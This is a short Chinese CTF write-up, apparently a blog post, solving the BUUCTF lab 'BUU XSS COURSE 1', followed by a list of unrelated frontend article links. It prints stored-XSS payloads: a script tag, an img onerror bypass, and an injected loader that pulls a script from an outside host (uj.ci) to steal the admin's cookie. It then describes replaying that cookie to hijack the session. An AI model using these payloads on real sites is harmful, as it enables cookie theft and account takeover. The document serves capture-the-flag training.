104,【4】 buuctf web [3.3.4 案例分析]BUU XSS COURSE 1

进入靶场

随便提交看看

访问此路径

知道这是存储型xss注入

开始xss注入

试试<script>alert('xss')</script>

不行,是把script过滤了

换一个

<img src=# onerror=alert(1)>

可以

寻找平台,创建项目

https://xssjs.com/

选择超强默认模式

之前测试img可以成功传入,所以选择这个

复制代码
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//uj.ci/wh3';>

记录cookie和url

先改url

显示没登陆是因为cookie没改

f12修改cookie

成功得到flag

我以为和早上的那道题肯定有点区别,可能是plus版,结果就是同一个题。。。。。。。。

相关推荐
zwjapple24 分钟前
docker-compose一键部署全栈项目。springboot后端,react前端
前端·spring boot·docker
像风一样自由20203 小时前
HTML与JavaScript:构建动态交互式Web页面的基石
前端·javascript·html
aiprtem3 小时前
基于Flutter的web登录设计
前端·flutter
浪裡遊3 小时前
React Hooks全面解析:从基础到高级的实用指南
开发语言·前端·javascript·react.js·node.js·ecmascript·php
why技术3 小时前
Stack Overflow,轰然倒下!
前端·人工智能·后端
GISer_Jing4 小时前
0704-0706上海,又聚上了
前端·新浪微博
止观止4 小时前
深入探索 pnpm:高效磁盘利用与灵活的包管理解决方案
前端·pnpm·前端工程化·包管理器
whale fall4 小时前
npm install安装的node_modules是什么
前端·npm·node.js
烛阴4 小时前
简单入门Python装饰器
前端·python
袁煦丞5 小时前
数据库设计神器DrawDB:cpolar内网穿透实验室第595个成功挑战
前端·程序员·远程工作